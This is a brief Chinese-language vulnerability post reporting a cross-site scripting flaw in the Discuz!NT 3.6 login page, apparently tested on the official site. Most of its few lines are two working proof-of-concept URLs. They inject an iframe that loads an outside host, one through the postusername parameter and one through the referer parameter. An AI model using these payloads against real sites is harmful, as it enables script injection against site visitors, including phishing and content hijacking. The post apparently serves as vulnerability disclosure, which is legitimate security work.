Discuz!NT 3.6 跨站漏洞 -- 官网测试
登陆框提交用户名或密码的时候存在跨站漏洞。
| 以下是引用片段: http://nt.discuz.net/login.aspx?postusername=%22%3E%3Ciframe%20src=%22http://lcx.cc%22%3E |
可以这样利用的,[size=-1]example:
| 以下是引用片段: example:http://nt.discuz.net/login.aspx?referer=%22%3E%3Ciframe%20src=%22http://lcx.cc%22%3E |